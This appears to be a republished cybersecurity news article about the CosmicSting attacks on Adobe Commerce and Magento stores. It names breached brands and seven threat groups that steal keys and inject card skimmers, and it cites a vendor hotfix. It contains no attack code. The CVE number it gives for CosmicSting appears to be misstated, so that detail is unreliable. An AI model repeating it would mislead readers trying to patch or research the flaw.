Website security company Sansec has been tracking the attacks since June 2024 and observed 4,275 stores breached in CosmicSting attacks, high-profile victims including Whirlpool, Ray-Ban, National Geographic, Segway, and Cisco, which BleepingComputer reported last month. The researchers are now tracking seven different threat groups that employ CosmicSting to compromise unpatched sites, named "Bobry," "Polyovki," "Surki," "Burunduki," "Ondatry," "Khomyaki," and "Belki." These groups are considered financially motivated opportunists, breaching the sites to steal credit card and customer information. The threat actors are leveraging CosmicSting to steal Magento cryptographic keys, inject payment skimmers to steal cards from order checkout webpages, and even fight each other for control over vulnerable stores. Adobe Commerce and Magento online stores are being targeted in "CosmicSting" attacks at an alarming rate, with threat actors hacking approximately 5% of all stores. Sansec told BleepingComputer that it has warned many of the sites, including Ray-Ban, Whirlpool, National Geographic, and Segway, about these attacks multiple times but has not heard back from any of them. Sansec founder Willem de Groot says that Segway and Whirlpool appear to be fixed and BleepingComputer could not find the malicious code on Ray-Ban's site, indicating it may be fixed as well. The CosmicSting vulnerability (CVE-2024-32102) is a critical severity information disclosure flaw; when chained with CVE-2024-2961, a security issue in glibc's iconv function, an attacker can achieve remote code execution on the target server. Sansec says that multiple threat actors are now conducting attacks as patching speed is not matching the critical nature of the situation. "Sansec projects that more stores will get hacked in the coming months, as 75% of the Adobe Commerce & Magento install base hadn't patched when the automated scanning for secret encryption keys started," warns Sansec. Ondatry was using the "TrojanOrder" flaw in 2022 but has now moved to CosmicSting, which goes to show how some threat actors specialize in the space and continually look for opportunities in easily exploitable critical vulnerabilities. The Polyovki threat actors use 'cdnstatics[.]net' to appear as if the scripts are for website analytics, as shown in the compromise of Ray-Ban's online store. Sansec has provided a tool to check if their site is vulnerable and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 03 Oct 2024 17:20:22 +0000